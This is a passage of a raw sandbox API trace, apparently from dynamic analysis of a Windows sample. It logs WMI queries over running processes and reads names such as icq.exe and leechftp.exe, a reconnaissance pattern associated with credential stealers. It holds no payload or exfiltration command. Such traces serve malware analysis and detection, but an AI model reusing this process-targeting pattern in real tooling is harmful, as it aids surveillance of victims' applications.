pszText="\\\\.\\root\\cimv2") returned 0x0 [0265.190] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f1d4 | out: puCount=0x19f1d4*=0x2) returned 0x0 [0265.190] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0x0, pszText=0x0 | out: puBuffLength=0x19f1d0*=0xf, pszText=0x0) returned 0x0 [0265.190] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f1d0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0265.190] IWbemClassObject:Get (in: This=0x551f408, wszName="Name", lFlags=0, pVal=0x19f1d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23d9b5c*=0, plFlavor=0x23d9b60*=0 | out: pVal=0x19f1d0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="icq.exe", varVal2=0x0), pType=0x23d9b5c*=8, plFlavor=0x23d9b60*=0) returned 0x0 [0265.190] SysStringByteLen (bstr="icq.exe") returned 0xe [0265.190] SysStringByteLen (bstr="icq.exe") returned 0xe [0265.191] IWbemClassObject:Get (in: This=0x551f408, wszName="Name", lFlags=0, pVal=0x19f1d8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23d9b5c*=8, plFlavor=0x23d9b60*=0 | out: pVal=0x19f1d8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="icq.exe", varVal2=0x0), pType=0x23d9b5c*=8, plFlavor=0x23d9b60*=0) returned 0x0 [0265.191] SysStringByteLen (bstr="icq.exe") returned 0xe [0265.191] SysStringByteLen (bstr="icq.exe") returned 0xe [0265.191] CoTaskMemAlloc (cb=0x4) returned 0x54ba398 [0265.191] IEnumWbemClassObject:Next (in: This=0x663848, lTimeout=-1, uCount=0x1, apObjects=0x54ba398, puReturned=0x23c1fd0 | out: apObjects=0x54ba398*=0x551f8d0, puReturned=0x23c1fd0*=0x1) returned 0x0 [0265.192] IUnknown:QueryInterface (in: This=0x551f8d0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e840 | out: ppvObject=0x19e840*=0x551f8d0) returned 0x0 [0265.192] IUnknown:QueryInterface (in: This=0x551f8d0, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e7fc | out: ppvObject=0x19e7fc*=0x0) returned 0x80004002 [0265.192] IUnknown:QueryInterface (in: This=0x551f8d0, riid=0x6c04fb20*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19e61c | out: ppvObject=0x19e61c*=0x0) returned 0x80004002 [0265.192] IUnknown:QueryInterface (in: This=0x551f8d0, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e3f4 | out: ppvObject=0x19e3f4*=0x0) returned 0x80004002 [0265.192] IUnknown:AddRef (This=0x551f8d0) returned 0x3 [0265.192] IUnknown:QueryInterface (in: This=0x551f8d0, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e15c | out: ppvObject=0x19e15c*=0x0) returned 0x80004002 [0265.192] IUnknown:QueryInterface (in: This=0x551f8d0, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e10c | out: ppvObject=0x19e10c*=0x0) returned 0x80004002 [0265.192] IUnknown:QueryInterface (in: This=0x551f8d0, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e118 | out: ppvObject=0x19e118*=0x551f8d4) returned 0x0 [0265.193] IMarshal:GetUnmarshalClass (in: This=0x551f8d4, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e120 | out: pCid=0x19e120*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0265.193] IUnknown:Release (This=0x551f8d4) returned 0x3 [0265.193] CoGetContextToken (in: pToken=0x19e178 | out: pToken=0x19e178) returned 0x0 [0265.193] CoGetContextToken (in: pToken=0x19e580 | out: pToken=0x19e580) returned 0x0 [0265.193] IUnknown:QueryInterface (in: This=0x551f8d0, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e610 | out: ppvObject=0x19e610*=0x0) returned 0x80004002 [0265.193] IUnknown:Release (This=0x551f8d0) returned 0x2 [0265.193] CoGetContextToken (in: pToken=0x19eb50 | out: pToken=0x19eb50) returned 0x0 [0265.193] CoGetContextToken (in: pToken=0x19eab0 | out: pToken=0x19eab0) returned 0x0 [0265.193] IUnknown:QueryInterface (in: This=0x551f8d0, riid=0x19eb80*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x19eb7c | out: ppvObject=0x19eb7c*=0x551f8d0) returned 0x0 [0265.193] IUnknown:AddRef (This=0x551f8d0) returned 0x4 [0265.193] IUnknown:Release (This=0x551f8d0) returned 0x3 [0265.193] IUnknown:Release (This=0x551f8d0) returned 0x2 [0265.193] CoTaskMemFree (pv=0x54ba398) [0265.193] CoGetContextToken (in: pToken=0x19eeb8 | out: pToken=0x19eeb8) returned 0x0 [0265.193] IUnknown:AddRef (This=0x551f8d0) returned 0x3 [0265.193] IWbemClassObject:Get (in: This=0x551f8d0, wszName="__GENUS", lFlags=0, pVal=0x19f1cc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f24c*=0, plFlavor=0x19f248*=0 | out: pVal=0x19f1cc*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x19f24c*=3, plFlavor=0x19f248*=64) returned 0x0 [0265.194] IWbemClassObject:Get (in: This=0x551f8d0, wszName="__PATH", lFlags=0, pVal=0x19f1b0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f234*=0, plFlavor=0x19f230*=0 | out: pVal=0x19f1b0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"1356\"", varVal2=0x0), pType=0x19f234*=8, plFlavor=0x19f230*=64) returned 0x0 [0265.194] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"1356\"") returned 0x5e [0265.194] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"1356\"") returned 0x5e [0265.194] CoGetObjectContext (in: riid=0x2232ee0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19f1dc | out: ppv=0x19f1dc*=0x601a94) returned 0x0 [0265.194] IComThreadingInfo:GetCurrentApartmentType (in: This=0x601a94, pAptType=0x19f1d4 | out: pAptType=0x19f1d4*=1) returned 0x0 [0265.194] IUnknown:QueryInterface (in: This=0x601a94, riid=0x2232ec8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x19f1d8 | out: ppvObject=0x19f1d8*=0x0) returned 0x80004002 [0265.194] IUnknown:Release (This=0x601a94) returned 0x1 [0265.195] CoGetClassObject (in: rclsid=0x6be02c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x6bfc54e0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19eb48 | out: ppv=0x19eb48*=0x54ba2c8) returned 0x0 [0265.195] WbemDefPath:IUnknown:QueryInterface (in: This=0x54ba2c8, riid=0x6bf795e0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19ed60 | out: ppvObject=0x19ed60*=0x0) returned 0x80004002 [0265.195] WbemDefPath:IClassFactory:CreateInstance (in: This=0x54ba2c8, pUnkOuter=0x0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ed74 | out: ppvObject=0x19ed74*=0x552a698) returned 0x0 [0265.195] WbemDefPath:IUnknown:Release (This=0x54ba2c8) returned 0x0 [0265.196] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a698, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e994 | out: ppvObject=0x19e994*=0x552a698) returned 0x0 [0265.196] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a698, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e950 | out: ppvObject=0x19e950*=0x0) returned 0x80004002 [0265.196] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a698, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e544 | out: ppvObject=0x19e544*=0x0) returned 0x80004002 [0265.196] WbemDefPath:IUnknown:AddRef (This=0x552a698) returned 0x3 [0265.196] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a698, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e2ac | out: ppvObject=0x19e2ac*=0x0) returned 0x80004002 [0265.196] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a698, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e25c | out: ppvObject=0x19e25c*=0x0) returned 0x80004002 [0265.196] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a698, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e268 | out: ppvObject=0x19e268*=0x5528658) returned 0x0 [0265.196] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5528658, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e270 | out: pCid=0x19e270*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0265.196] WbemDefPath:IUnknown:Release (This=0x5528658) returned 0x3 [0265.196] CoGetContextToken (in: pToken=0x19e2c8 | out: pToken=0x19e2c8) returned 0x0 [0265.196] CoGetContextToken (in: pToken=0x19e6d0 | out: pToken=0x19e6d0) returned 0x0 [0265.196] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a698, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e760 | out: ppvObject=0x19e760*=0x0) returned 0x80004002 [0265.196] WbemDefPath:IUnknown:Release (This=0x552a698) returned 0x2 [0265.196] WbemDefPath:IUnknown:Release (This=0x552a698) returned 0x1 [0265.196] CoGetContextToken (in: pToken=0x19f058 | out: pToken=0x19f058) returned 0x0 [0265.196] CoGetContextToken (in: pToken=0x19efb8 | out: pToken=0x19efb8) returned 0x0 [0265.197] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a698, riid=0x19f088*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x19f084 | out: ppvObject=0x19f084*=0x552a698) returned 0x0 [0265.197] WbemDefPath:IUnknown:AddRef (This=0x552a698) returned 0x3 [0265.197] WbemDefPath:IUnknown:Release (This=0x552a698) returned 0x2 [0265.197] WbemDefPath:IWbemPath:SetText (This=0x552a698, uMode=0x4, pszPath="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"1356\"") returned 0x0 [0265.197] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f208 | out: puCount=0x19f208*=0x2) returned 0x0 [0265.197] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0x0, pszText=0x0 | out: puBuffLength=0x19f204*=0xf, pszText=0x0) returned 0x0 [0265.197] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f204*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0265.197] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f1d4 | out: puCount=0x19f1d4*=0x2) returned 0x0 [0265.197] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0x0, pszText=0x0 | out: puBuffLength=0x19f1d0*=0xf, pszText=0x0) returned 0x0 [0265.197] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f1d0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0265.197] IWbemClassObject:Get (in: This=0x551f8d0, wszName="Name", lFlags=0, pVal=0x19f1d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23da3d8*=0, plFlavor=0x23da3dc*=0 | out: pVal=0x19f1d0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="leechftp.exe", varVal2=0x0), pType=0x23da3d8*=8, plFlavor=0x23da3dc*=0) returned 0x0 [0265.197] SysStringByteLen (bstr="leechftp.exe") returned 0x18 [0265.197] SysStringByteLen (bstr="leechftp.exe") returned 0x18 [0265.197] IWbemClassObject:Get (in: This=0x551f8d0, wszName="Name", lFlags=0, pVal=0x19f1d8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23da3d8*=8, plFlavor=0x23da3dc*=0 | out: pVal=0x19f1d8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="leechftp.exe", varVal2=0x0), pType=0x23da3d8*=8, plFlavor=0x23da3dc*=0) returned 0x0 [0265.199] SysStringByteLen (bstr="leechftp.exe") returned 0x18 [0265.199] SysStringByteLen (bstr="leechftp.exe") returned 0x18 [0265.199] CoTaskMemAlloc (cb=0x4) returned 0x54ba398 [0265.199] IEnumWbemClassObject:Next (in: This=0x663848, lTimeout=-1, uCount=0x1, apObjects=0x54ba398, puReturned=0x23c1fd0 | out: apObjects=0x54ba398*=0x551fc00, puReturned=0x23c1fd0*=0x1) returned 0x0 [0265.200] IUnknown:QueryInterface (in: This=0x551fc00, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e840 | out: ppvObject=0x19e840*=0x551fc00) returned 0x0 [0265.200] IUnknown:QueryInterface (in: This=0x551fc00, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e7fc | out: ppvObject=0x19e7fc*=0x0) returned 0x80004002 [0265.200] IUnknown:QueryInterface (in: This=0x551fc00, riid=0x6c04fb20*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19e61c | out: ppvObject=0x19e61c*=0x0) returned 0x80004002 [0265.200] IUnknown:QueryInterface (in: This=0x551fc00, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e3f4 | out: ppvObject=0x19e3f4*=0x0) returned 0x80004002 [0265.200] IUnknown:AddRef (This=0x551fc00) returned 0x3 [0265.200] IUnknown:QueryInterface (in: This=0x551fc00, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e15c | out: ppvObject=0x19e15c*=0x0) returned 0x80004002 [0265.200] IUnknown:QueryInterface (in: This=0x551fc00, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e10c | out: ppvObject=0x19e10c*=0x0) returned 0x80004002 [0265.200] IUnknown:QueryInterface (in: This=0x551fc00, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e118 | out: ppvObject=0x19e118*=0x551fc04) returned 0x0 [0265.200] IMarshal:GetUnmarshalClass (in: This=0x551fc04, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e120 | out: pCid=0x19e120*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0265.201] IUnknown:Release (This=0x551fc04) returned 0x3 [0265.201] CoGetContextToken (in: pToken=0x19e178 | out: pToken=0x19e178) returned 0x0 [0265.201] CoGetContextToken (in: pToken=0x19e580 | out: pToken=0x19e580) returned 0x0 [0265.201] IUnknown:QueryInterface (in: This=0x551fc00, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e610 | out: ppvObject=0x19e610*=0x0) returned 0x80004002 [0265.201] IUnknown:Release (This=0x551fc00) returned 0x2 [0265.201] CoGetContextToken (in: pToken=0x19eb50 | out: pToken=0x19eb50) returned 0x0 [0265.201] CoGetContextToken (in: pToken=0x19eab0 | out: pToken=0x19eab0) returned 0x0 [0265.201] IUnknown:QueryInterface (in: This=0x551fc00, riid=0x19eb80*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x19eb7c | out: ppvObject=0x19eb7c*=0x551fc00) returned 0x0 [0265.202] IUnknown:AddRef (This=0x551fc00) returned 0x4 [0265.202] IUnknown:Release (This=0x551fc00) returned 0x3 [0265.202] IUnknown:Release (This=0x551fc00) returned 0x2 [0265.202] CoTaskMemFree (pv=0x54ba398) [0265.202] CoGetContextToken (in: pToken=0x19eeb8 | out: pToken=0x19eeb8) returned 0x0 [0265.202] IUnknown:AddRef (This=0x551fc00) returned 0x3 [0265.202] IWbemClassObject:Get (in: This=0x551fc00, wszName="__GENUS", lFlags=0, pVal=0x19f1cc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f24c*=0, plFlavor=0x19f248*=0 | out: pVal=0x19f1cc*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x19f24c*=3, plFlavor=0x19f248*=64) returned 0x0 [0265.202] IWbemClassObject:Get (in: This=0x551fc00, wszName="__PATH", lFlags=0, pVal=0x19f1b0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f234*=0, plFlavor=0x19f230*=0 | out: pVal=0x19f1b0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"2116\"", varVal2=0x0), pType=0x19f234*=8, plFlavor=0x19f230*=64) returned 0x0 [0265.202] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"2116\"") returned 0x5e [0265.202] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"2116\"") returned 0x5e [0265.202] CoGetObjectContext (in: riid=0x2232ee0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19f1dc | out: ppv=0x19f1dc*=0x601a94) returned 0x0 [0265.202] IComThreadingInfo:GetCurrentApartmentType (in: This=0x601a94, pAptType=0x19f1d4 | out: pAptType=0x19f1d4*=1) returned 0x0 [0265.202] IUnknown:QueryInterface (in: This=0x601a94, riid=0x2232ec8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x19f1d8 | out: ppvObject=0x19f1d8*=0x0) returned 0x80004002 [0265.203] IUnknown:Release (This=0x601a94) returned 0x1 [0265.203] CoGetClassObject (in: rclsid=0x6be02c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x6bfc54e0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19eb48 | out: ppv=0x19eb48*=0x54ba2c8) returned 0x0 [0265.204] WbemDefPath:IUnknown:QueryInterface (in: This=0x54ba2c8, riid=0x6bf795e0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19ed60 | out: ppvObject=0x19ed60*=0x0) returned 0x80004002 [0265.204] WbemDefPath:IClassFactory:CreateInstance (in: This=0x54ba2c8, pUnkOuter=0x0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ed74 | out: ppvObject=0x19ed74*=0x552a008) returned 0x0 [0265.204] WbemDefPath:IUnknown:Release (This=0x54ba2c8) returned 0x0 [0265.204] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a008, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e994 | out: ppvObject=0x19e994*=0x552a008) returned 0x0 [0265.204] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a008, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e950 | out: ppvObject=0x19e950*=0x0) returned 0x80004002 [0265.204] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a008, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e544 | out: ppvObject=0x19e544*=0x0) returned 0x80004002 [0265.204] WbemDefPath:IUnknown:AddRef (This=0x552a008) returned 0x3 [0265.204] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a008, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e2ac | out: ppvObject=0x19e2ac*=0x0) returned 0x80004002 [0265.204] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a008, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e25c | out: ppvObject=0x19e25c*=0x0) returned 0x80004002 [0265.204] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a008, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e268 | out: ppvObject=0x19e268*=0x5528550) returned 0x0 [0265.205] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5528550, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, 